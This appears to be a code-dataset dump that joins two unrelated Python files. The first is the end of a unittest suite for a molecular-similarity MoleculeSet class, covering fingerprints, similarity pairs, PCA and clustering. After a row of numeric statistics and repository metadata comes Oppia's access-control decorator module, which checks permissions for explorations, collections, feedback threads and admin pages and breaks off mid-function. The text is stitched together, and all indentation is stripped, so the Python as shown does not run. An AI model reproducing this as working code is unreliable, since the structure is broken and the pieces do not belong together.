for descriptor in SUPPORTED_FPRINTS:
for similarity_measure in SUPPORTED_SIMILARITIES:
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
fingerprint_type=descriptor,
similarity_measure=similarity_measure,
is_verbose=False,
)
self.assertFalse(
molecule_set.is_verbose, "Expected is_verbose to be False"
)
self.assertIsNotNone(
molecule_set.molecule_database,
"Expected molecule_database to be set from csv file",
)
for molecule in molecule_set.molecule_database:
self.assertTrue(
molecule.descriptor.check_init(),
"Expected descriptor to be set",
)
self.assertIsNotNone(
molecule_set.similarity_matrix,
"Expected similarity_matrix to be set",
)
print(f"Test complete. Deleting file {csv_fpath}...")
remove(csv_fpath)
def test_get_most_similar_pairs(self):
"""
Test that all combinations of fingerprint_type and similarity measure
works with the MoleculeSet.get_most_similar_pairs() method.
"""
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv")
for descriptor in SUPPORTED_FPRINTS:
for similarity_measure in SUPPORTED_SIMILARITIES:
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
fingerprint_type=descriptor,
similarity_measure=similarity_measure,
is_verbose=False,
)
molecule_pairs = molecule_set.get_most_similar_pairs()
self.assertIsInstance(
molecule_pairs,
list,
"Expected get_most_similar_pairs() to return list",
)
for pair in molecule_pairs:
self.assertIsInstance(
pair,
tuple,
"Expected elements of list "
"returned by get_most_similar_pairs()"
" to be tuples",
)
def test_get_most_dissimilar_pairs(self):
"""
Test that all combinations of fingerprint_type and similarity measure
works with the MoleculeSet.get_most_dissimilar_pairs() method.
"""
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv")
for descriptor in SUPPORTED_FPRINTS:
for similarity_measure in SUPPORTED_SIMILARITIES:
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
fingerprint_type=descriptor,
similarity_measure=similarity_measure,
is_verbose=False,
)
molecule_pairs = molecule_set.get_most_dissimilar_pairs()
self.assertIsInstance(
molecule_pairs,
list,
"Expected get_most_dissimilar_pairs() " "to return list",
)
for pair in molecule_pairs:
self.assertIsInstance(
pair,
tuple,
"Expected elements of list returned"
" by get_most_dissimilar_pairs() "
"to be tuples",
)
def test_pca_transform(self):
"""
Test the unsupervised transformation of molecules in
MoleculSet using Principal Component Analysis.
"""
n_features = 20
features = np.random.normal(size=(len(self.test_smiles), n_features))
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv", feature_arr=features)
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
similarity_measure="l0_similarity",
is_verbose=True,
)
features = StandardScaler().fit_transform(features)
features = PCA().fit_transform(features)
error_matrix = features - molecule_set.get_transformed_descriptors()
error_threshold = 1e-6
self.assertLessEqual(
error_matrix.min(),
error_threshold,
"Expected transformed molecular descriptors to be "
"equal to PCA decomposed features",
)
def test_clustering_fingerprints(self):
"""
Test the clustering of molecules featurized by their fingerprints.
"""
csv_fpath = self.smiles_seq_to_xl_or_csv(ftype="csv")
n_clusters = 3
for descriptor in SUPPORTED_FPRINTS:
for similarity_measure in SUPPORTED_SIMILARITIES:
molecule_set = MoleculeSet(
molecule_database_src=csv_fpath,
molecule_database_src_type="csv",
fingerprint_type=descriptor,
similarity_measure=similarity_measure,
is_verbose=True,
)
with self.assertRaises(NotInitializedError):
molecule_set.get_cluster_labels()
if molecule_set.similarity_measure.is_distance_metric():
molecule_set.cluster(n_clusters=n_clusters)
self.assertLessEqual(
len(set(molecule_set.get_cluster_labels())),
n_clusters,
"Expected number of cluster labels to be "
"less than equal to number of clusters",
)
if molecule_set.similarity_measure.type_ == "continuous":
self.assertEqual(
str(molecule_set.clusters_),
"kmedoids",
f"Expected kmedoids clustering for "
f"similarity: {similarity_measure}",
)
else:
self.assertEqual(
str(molecule_set.clusters_),
"complete_linkage",
f"Expected complete_linkage clustering"
f"for similarity: {similarity_measure}",
)
else:
with self.assertRaises(InvalidConfigurationError):
molecule_set.cluster(n_clusters=n_clusters)
if __name__ == "__main__":
unittest.main()
| 38.886424 | 85 | 0.573942 | 4,585 | 43,825 | 5.244929 | 0.061723 | 0.097804 | 0.050566 | 0.055015 | 0.864022 | 0.85059 | 0.836577 | 0.822189 | 0.81566 | 0.803102 | 0 | 0.002302 | 0.35571 | 43,825 | 1,126 | 86 | 38.920959 | 0.849377 | 0.092755 | 0 | 0.691111 | 0 | 0.002222 | 0.202718 | 0.007688 | 0 | 0 | 0 | 0 | 0.113333 | 1 | 0.032222 | false | 0 | 0.014444 | 0 | 0.056667 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0a0583de8ff33c8d46e0c134be5353ed8b775cf5 | 102,967 | py | Python | core/controllers/acl_decorators.py | huntermaxfield/oppia | c0fac18a9fc7ea9fed555fb06818496f5ba92dcb | [
"Apache-2.0"
] | null | null | null | core/controllers/acl_decorators.py | huntermaxfield/oppia | c0fac18a9fc7ea9fed555fb06818496f5ba92dcb | [
"Apache-2.0"
] | null | null | null | core/controllers/acl_decorators.py | huntermaxfield/oppia | c0fac18a9fc7ea9fed555fb06818496f5ba92dcb | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
#
# Copyright 2017 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Decorators to provide authorization across the site."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import functools
from constants import constants
from core.controllers import base
from core.domain import classifier_services
from core.domain import classroom_services
from core.domain import feedback_services
from core.domain import question_services
from core.domain import rights_manager
from core.domain import role_services
from core.domain import skill_domain
from core.domain import skill_fetchers
from core.domain import story_domain
from core.domain import story_fetchers
from core.domain import subtopic_page_services
from core.domain import suggestion_services
from core.domain import topic_domain
from core.domain import topic_fetchers
from core.domain import topic_services
from core.domain import user_services
import feconf
import utils
def _redirect_based_on_return_type(
handler, redirection_url, expected_return_type):
"""Redirects to the provided URL if the handler type is not JSON.
Args:
handler: function. The function to be decorated.
redirection_url: str. The URL to redirect to.
expected_return_type: str. The type of the response to be returned
in case of errors eg. html, json.
Raises:
PageNotFoundException. The page is not found.
"""
if expected_return_type == feconf.HANDLER_TYPE_JSON:
raise handler.PageNotFoundException
else:
handler.redirect(redirection_url)
def open_access(handler):
"""Decorator to give access to everyone.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that can also give access to
everyone.
"""
def test_can_access(self, *args, **kwargs):
"""Gives access to everyone.
Args:
*args: list(*). A list of arguments.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
"""
return handler(self, *args, **kwargs)
test_can_access.__wrapped__ = True
return test_can_access
def does_classroom_exist(handler):
"""Decorator to check whether classroom exists.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function.
"""
def test_does_classroom_exist(self, classroom_url_fragment, **kwargs):
"""Checks if classroom url fragment provided is valid. If so, return
handler or else redirect to the correct classroom.
Args:
classroom_url_fragment: str. The classroom url fragment.
**kwargs: *. Keyword arguments.
Returns:
handler. function. The newly decorated function.
"""
classroom = classroom_services.get_classroom_by_url_fragment(
classroom_url_fragment)
if not classroom:
_redirect_based_on_return_type(
self, '/learn/%s' % constants.DEFAULT_CLASSROOM_URL_FRAGMENT,
self.GET_HANDLER_ERROR_RETURN_TYPE)
return
return handler(self, classroom_url_fragment, **kwargs)
test_does_classroom_exist.__wrapped__ = True
return test_does_classroom_exist
def can_play_exploration(handler):
"""Decorator to check whether user can play given exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now can check if users can
play a given exploration.
"""
def test_can_play(self, exploration_id, **kwargs):
"""Checks if the user can play the exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
"""
if exploration_id in feconf.DISABLED_EXPLORATION_IDS:
raise self.PageNotFoundException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if exploration_rights is None:
raise self.PageNotFoundException
if rights_manager.check_can_access_activity(
self.user, exploration_rights):
return handler(self, exploration_id, **kwargs)
else:
raise self.PageNotFoundException
test_can_play.__wrapped__ = True
return test_can_play
def can_view_skills(handler):
"""Decorator to check whether user can view multiple given skills.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that can also check if the user
can view multiple given skills.
"""
def test_can_view(self, comma_separated_skill_ids, **kwargs):
"""Checks if the user can view the skills.
Args:
comma_separated_skill_ids: str. The skill ids
separated by commas.
**kwargs: *. Keyword arguments.
Returns:
bool. Whether the user can view the given skills.
Raises:
PageNotFoundException. The page is not found.
"""
# This is a temporary check, since a decorator is required for every
# method. Once skill publishing is done, whether given skill is
# published should be checked here.
skill_ids = comma_separated_skill_ids.split(',')
try:
for skill_id in skill_ids:
skill_domain.Skill.require_valid_skill_id(skill_id)
except utils.ValidationError:
raise self.InvalidInputException
try:
skill_fetchers.get_multi_skills(skill_ids)
except Exception as e:
raise self.PageNotFoundException(e)
return handler(self, comma_separated_skill_ids, **kwargs)
test_can_view.__wrapped__ = True
return test_can_view
def can_play_collection(handler):
"""Decorator to check whether user can play given collection.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that can also check if a user can
play a given collection.
"""
def test_can_play(self, collection_id, **kwargs):
"""Checks if the user can play the collection.
Args:
collection_id: str. The collection id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
"""
collection_rights = rights_manager.get_collection_rights(
collection_id, strict=False)
if collection_rights is None:
raise self.PageNotFoundException
if rights_manager.check_can_access_activity(
self.user, collection_rights):
return handler(self, collection_id, **kwargs)
else:
raise self.PageNotFoundException
test_can_play.__wrapped__ = True
return test_can_play
def can_download_exploration(handler):
"""Decorator to check whether user can download given exploration.
If a user is authorized to play given exploration, they can download it.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that can also check if the user
has permission to download a given exploration.
"""
def test_can_download(self, exploration_id, **kwargs):
"""Checks if the user can download the exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
"""
if exploration_id in feconf.DISABLED_EXPLORATION_IDS:
raise base.UserFacingExceptions.PageNotFoundException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if exploration_rights is None:
raise self.PageNotFoundException
if rights_manager.check_can_access_activity(
self.user, exploration_rights):
return handler(self, exploration_id, **kwargs)
else:
raise self.PageNotFoundException
test_can_download.__wrapped__ = True
return test_can_download
def can_view_exploration_stats(handler):
"""Decorator to check whether user can view exploration stats.
If a user is authorized to play given exploration, they can view its stats.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that checks if the user
has permission to view exploration stats.
"""
def test_can_view_stats(self, exploration_id, **kwargs):
"""Checks if the user can view the exploration stats.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
"""
if exploration_id in feconf.DISABLED_EXPLORATION_IDS:
raise base.UserFacingExceptions.PageNotFoundException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if exploration_rights is None:
raise self.PageNotFoundException
if rights_manager.check_can_access_activity(
self.user, exploration_rights):
return handler(self, exploration_id, **kwargs)
else:
raise base.UserFacingExceptions.PageNotFoundException
test_can_view_stats.__wrapped__ = True
return test_can_view_stats
def can_edit_collection(handler):
"""Decorator to check whether the user can edit collection.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that checks if the user has
permission to edit a given collection.
"""
def test_can_edit(self, collection_id, **kwargs):
"""Checks if the user is logged in and can edit the collection.
Args:
collection_id: str. The collection id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have
credentials to edit the collection.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
collection_rights = rights_manager.get_collection_rights(
collection_id, strict=False)
if collection_rights is None:
raise base.UserFacingExceptions.PageNotFoundException
if rights_manager.check_can_edit_activity(
self.user, collection_rights):
return handler(self, collection_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to edit this collection.')
test_can_edit.__wrapped__ = True
return test_can_edit
def can_manage_email_dashboard(handler):
"""Decorator to check whether user can access email dashboard.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now checks if the user has
permission to access the email dashboard.
"""
def test_can_manage_emails(self, **kwargs):
"""Checks if the user is logged in and can access email dashboard.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
access the email dashboard.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
if role_services.ACTION_MANAGE_EMAIL_DASHBOARD in self.user.actions:
return handler(self, **kwargs)
raise self.UnauthorizedUserException(
'You do not have credentials to access email dashboard.')
test_can_manage_emails.__wrapped__ = True
return test_can_manage_emails
def can_access_moderator_page(handler):
"""Decorator to check whether user can access moderator page.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now checks if the user has
permission to access the moderator page.
"""
def test_can_access_moderator_page(self, **kwargs):
"""Checks if the user is logged in and can access moderator page.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
access the moderator page.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
if role_services.ACTION_ACCESS_MODERATOR_PAGE in self.user.actions:
return handler(self, **kwargs)
raise self.UnauthorizedUserException(
'You do not have credentials to access moderator page.')
test_can_access_moderator_page.__wrapped__ = True
return test_can_access_moderator_page
def can_send_moderator_emails(handler):
"""Decorator to check whether user can send moderator emails.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the user
has permission to send moderator emails.
"""
def test_can_send_moderator_emails(self, **kwargs):
"""Checks if the user is logged in and can send moderator emails.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
send moderator emails.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
if role_services.ACTION_SEND_MODERATOR_EMAILS in self.user.actions:
return handler(self, **kwargs)
raise self.UnauthorizedUserException(
'You do not have credentials to send moderator emails.')
test_can_send_moderator_emails.__wrapped__ = True
return test_can_send_moderator_emails
def can_manage_own_account(handler):
"""Decorator to check whether user can manage their account.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the user
has permission to manage their account.
"""
def test_can_manage_account(self, **kwargs):
"""Checks if the user is logged in and can manage their account.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
manage account or preferences.
"""
if not self.user_id:
raise self.NotLoggedInException
if role_services.ACTION_MANAGE_ACCOUNT in self.user.actions:
return handler(self, **kwargs)
raise self.UnauthorizedUserException(
'You do not have credentials to manage account or preferences.')
test_can_manage_account.__wrapped__ = True
return test_can_manage_account
def can_access_admin_page(handler):
"""Decorator that checks if the current user is a super admin.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the user
is a super admin.
"""
def test_super_admin(self, **kwargs):
"""Checks if the user is logged in and is a super admin.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user is not a super admin of the
application.
"""
if not self.user_id:
raise self.NotLoggedInException
if not self.current_user_is_super_admin:
raise self.UnauthorizedUserException(
'%s is not a super admin of this application' % self.user_id)
return handler(self, **kwargs)
test_super_admin.__wrapped__ = True
return test_super_admin
def can_delete_any_user(handler):
"""Decorator that checks if the current user can delete any user.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the user
can delete any user.
"""
def test_primary_admin(self, **kwargs):
"""Checks if the user is logged in and is a primary admin e.g. user with
email address equal to feconf.SYSTEM_EMAIL_ADDRESS.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user is not a primary admin of the
application.
"""
if not self.user_id:
raise self.NotLoggedInException
email = user_services.get_email_from_user_id(self.user_id)
if email != feconf.SYSTEM_EMAIL_ADDRESS:
raise self.UnauthorizedUserException(
'%s cannot delete any user.' % self.user_id)
return handler(self, **kwargs)
test_primary_admin.__wrapped__ = True
return test_primary_admin
def can_upload_exploration(handler):
"""Decorator that checks if the current user can upload exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to upload an exploration.
"""
def test_can_upload(self, **kwargs):
"""Checks if the user can upload exploration.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
upload an exploration.
"""
if not self.user_id:
raise self.NotLoggedInException
if not self.current_user_is_super_admin:
raise self.UnauthorizedUserException(
'You do not have credentials to upload explorations.')
return handler(self, **kwargs)
test_can_upload.__wrapped__ = True
return test_can_upload
def can_create_exploration(handler):
"""Decorator to check whether the user can create an exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to create an exploration.
"""
def test_can_create(self, **kwargs):
"""Checks if the user can create an exploration.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
create an exploration.
"""
if self.user_id is None:
raise self.NotLoggedInException
if role_services.ACTION_CREATE_EXPLORATION in self.user.actions:
return handler(self, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to create an exploration.')
test_can_create.__wrapped__ = True
return test_can_create
def can_create_collection(handler):
"""Decorator to check whether the user can create a collection.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to create a collection.
"""
def test_can_create(self, **kwargs):
"""Checks if the user can create a collection.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
create a collection.
"""
if self.user_id is None:
raise self.NotLoggedInException
if role_services.ACTION_CREATE_COLLECTION in self.user.actions:
return handler(self, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to create a collection.')
test_can_create.__wrapped__ = True
return test_can_create
def can_access_creator_dashboard(handler):
"""Decorator to check whether the user can access creator dashboard page.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a
user has permission to access the creator dashboard page.
"""
def test_can_access(self, **kwargs):
"""Checks if the user can access the creator dashboard page.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have credentials to
access creator dashboard.
"""
if self.user_id is None:
raise self.NotLoggedInException
if role_services.ACTION_ACCESS_CREATOR_DASHBOARD in self.user.actions:
return handler(self, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to access creator dashboard.')
test_can_access.__wrapped__ = True
return test_can_access
def can_create_feedback_thread(handler):
"""Decorator to check whether the user can create a feedback thread.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to create a feedback thread.
"""
def test_can_access(self, exploration_id, **kwargs):
"""Checks if the user can create a feedback thread.
Args:
exploration_id: str. The ID of the exploration where the thread will
be created.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials to
create an exploration feedback.
"""
if exploration_id in feconf.DISABLED_EXPLORATION_IDS:
raise base.UserFacingExceptions.PageNotFoundException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if rights_manager.check_can_access_activity(
self.user, exploration_rights):
return handler(self, exploration_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to create exploration feedback.')
test_can_access.__wrapped__ = True
return test_can_access
def can_view_feedback_thread(handler):
"""Decorator to check whether the user can view a feedback thread.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to view a feedback thread.
"""
def test_can_access(self, thread_id, **kwargs):
"""Checks if the user can view a feedback thread.
Args:
thread_id: str. The feedback thread id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
InvalidInputException. The thread ID is not valid.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials to
view an exploration feedback.
"""
if '.' not in thread_id:
raise self.InvalidInputException('Thread ID must contain a .')
entity_type = feedback_services.get_thread(thread_id).entity_type
entity_types_with_unrestricted_view_suggestion_access = (
feconf.ENTITY_TYPES_WITH_UNRESTRICTED_VIEW_SUGGESTION_ACCESS)
if entity_type in entity_types_with_unrestricted_view_suggestion_access:
return handler(self, thread_id, **kwargs)
exploration_id = feedback_services.get_exp_id_from_thread_id(thread_id)
if exploration_id in feconf.DISABLED_EXPLORATION_IDS:
raise base.UserFacingExceptions.PageNotFoundException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if rights_manager.check_can_access_activity(
self.user, exploration_rights):
return handler(self, thread_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to view exploration feedback.')
test_can_access.__wrapped__ = True
return test_can_access
def can_comment_on_feedback_thread(handler):
"""Decorator to check whether the user can comment on feedback thread.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the user
has permission to comment on a given feedback thread.
"""
def test_can_access(self, thread_id, **kwargs):
"""Checks if the user can comment on the feedback thread.
Args:
thread_id: str. The feedback thread id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
InvalidInputException. The thread ID is not valid.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials to
comment on an exploration feedback.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
if '.' not in thread_id:
raise self.InvalidInputException('Thread ID must contain a .')
exploration_id = feedback_services.get_exp_id_from_thread_id(thread_id)
if exploration_id in feconf.DISABLED_EXPLORATION_IDS:
raise base.UserFacingExceptions.PageNotFoundException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if rights_manager.check_can_access_activity(
self.user, exploration_rights):
return handler(self, thread_id, **kwargs)
else:
raise self.UnauthorizedUserException(
'You do not have credentials to comment on exploration'
' feedback.')
test_can_access.__wrapped__ = True
return test_can_access
def can_rate_exploration(handler):
"""Decorator to check whether the user can give rating to given
exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if the user
has permission to rate a given exploration.
"""
def test_can_rate(self, exploration_id, **kwargs):
"""Checks if the user can rate the exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
UnauthorizedUserException. The user does not have credentials to
rate an exploration.
"""
if (role_services.ACTION_RATE_ANY_PUBLIC_EXPLORATION in
self.user.actions):
return handler(self, exploration_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to give ratings to explorations.')
test_can_rate.__wrapped__ = True
return test_can_rate
def can_flag_exploration(handler):
"""Decorator to check whether user can flag given exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if
a user can flag a given exploration.
"""
def test_can_flag(self, exploration_id, **kwargs):
"""Checks if the user can flag the exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
UnauthorizedUserException. The user does not have credentials to
flag an exploration.
"""
if role_services.ACTION_FLAG_EXPLORATION in self.user.actions:
return handler(self, exploration_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to flag explorations.')
test_can_flag.__wrapped__ = True
return test_can_flag
def can_subscribe_to_users(handler):
"""Decorator to check whether user can subscribe/unsubscribe a creator.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to subscribe/unsubscribe a creator.
"""
def test_can_subscribe(self, **kwargs):
"""Checks if the user can subscribe/unsubscribe a creator.
Args:
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
UnauthorizedUserException. The user does not have credentials to
manage subscriptions.
"""
if role_services.ACTION_SUBSCRIBE_TO_USERS in self.user.actions:
return handler(self, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to manage subscriptions.')
test_can_subscribe.__wrapped__ = True
return test_can_subscribe
def can_edit_exploration(handler):
"""Decorator to check whether the user can edit given exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if
a user has permission to edit a given exploration.
"""
def test_can_edit(self, exploration_id, *args, **kwargs):
"""Checks if the user can edit the exploration.
Args:
exploration_id: str. The exploration id.
*args: list(*). A list of arguments.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials to
edit an exploration.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if exploration_rights is None:
raise base.UserFacingExceptions.PageNotFoundException
if rights_manager.check_can_edit_activity(
self.user, exploration_rights):
return handler(self, exploration_id, *args, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to edit this exploration.')
test_can_edit.__wrapped__ = True
return test_can_edit
def can_voiceover_exploration(handler):
"""Decorator to check whether the user can voiceover given exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to voiceover a given exploration.
"""
def test_can_voiceover(self, exploration_id, **kwargs):
"""Checks if the user can voiceover the exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: dict(str: *). Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials to
voiceover an exploration.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if exploration_rights is None:
raise base.UserFacingExceptions.PageNotFoundException
if rights_manager.check_can_voiceover_activity(
self.user, exploration_rights):
return handler(self, exploration_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have credentials to voiceover this exploration.')
test_can_voiceover.__wrapped__ = True
return test_can_voiceover
def can_save_exploration(handler):
"""Decorator to check whether user can save exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that checks if
a user has permission to save a given exploration.
"""
def test_can_save(self, exploration_id, **kwargs):
"""Checks if the user can save the exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: dict(str: *). Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
PageNotFoundException. The page is not found.
UnauthorizedUserException. The user does not have credentials to
save changes to this exploration.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if exploration_rights is None:
raise base.UserFacingExceptions.PageNotFoundException
if rights_manager.check_can_save_activity(
self.user, exploration_rights):
return handler(self, exploration_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'You do not have permissions to save this exploration.')
test_can_save.__wrapped__ = True
return test_can_save
def can_delete_exploration(handler):
"""Decorator to check whether user can delete exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that checks if a user has
permission to delete a given exploration.
"""
def test_can_delete(self, exploration_id, **kwargs):
"""Checks if the user can delete the exploration.
Args:
exploration_id: str. The exploration id.
**kwargs: *. Keyword arguments.
Returns:
*. The return value of the decorated function.
Raises:
NotLoggedInException. The user is not logged in.
UnauthorizedUserException. The user does not have permissions to
delete an exploration.
"""
if not self.user_id:
raise base.UserFacingExceptions.NotLoggedInException
exploration_rights = rights_manager.get_exploration_rights(
exploration_id, strict=False)
if rights_manager.check_can_delete_activity(
self.user, exploration_rights):
return handler(self, exploration_id, **kwargs)
else:
raise base.UserFacingExceptions.UnauthorizedUserException(
'User %s does not have permissions to delete exploration %s' %
(self.user_id, exploration_id))
test_can_delete.__wrapped__ = True
return test_can_delete
def can_suggest_changes_to_exploration(handler):
"""Decorator to check whether a user can make suggestions to an
exploration.
Args:
handler: function. The function to be decorated.
Returns:
function. The newly decorated function that now also checks if a user
has permission to make suggestions to an exploration.
"""
def test_can_suggest(self, exploration_id, **kwargs):
